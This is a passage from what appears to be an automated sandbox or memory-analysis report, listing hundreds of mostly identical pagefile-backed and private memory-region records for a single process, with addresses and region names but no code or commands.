"pagefile_0x00000000002a0000" filename = "" Region: id = 7686 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7687 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7688 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7689 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7690 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7691 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7692 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7693 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7694 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7695 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7696 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7697 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7698 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7699 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7700 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7701 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7702 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7703 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7798 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7799 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7800 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7801 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7802 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7803 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7804 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7805 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7806 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7807 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7808 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7809 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7810 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7811 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7812 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7813 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7814 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7815 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7816 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7817 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7818 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7819 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7820 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7821 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7822 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7823 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7824 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7825 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7826 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7827 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7828 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7829 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7831 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7832 start_va = 0x2a0000 
end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7833 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7834 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7835 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7836 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7837 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7838 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7839 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7840 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7841 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7842 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7843 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7844 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7845 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7846 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7847 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7848 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7849 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7850 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7851 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7852 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7853 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7854 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7899 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7900 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7901 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: 
id = 7902 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7903 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7904 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7905 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7906 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7907 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7908 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7909 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7910 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7911 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7912 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7913 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7914 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 7915 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7916 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7917 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7918 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7919 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7920 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7921 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7922 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7923 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7924 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7925 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7926 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7927 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 7928 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7929 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7930 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7931 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7932 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7933 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7934 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7935 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7936 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7937 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7938 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7939 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7955 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7956 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7957 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7958 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7959 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7960 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7961 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7962 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7963 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8051 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8052 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8053 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8054 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8059 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8060 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8061 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8062 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8063 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8064 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8065 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8066 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8067 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8068 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8069 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8070 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8071 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8072 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8073 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8074 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8075 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8076 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8077 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8078 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8081 start_va = 0x2a0000 
end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8123 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8124 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8125 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8126 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8127 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8128 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8129 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8130 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8131 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8132 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8134 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8135 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8136 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: 
id = 8137 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8138 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8139 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8140 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8141 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8142 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8143 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8144 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8145 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8146 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8147 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8148 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8149 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
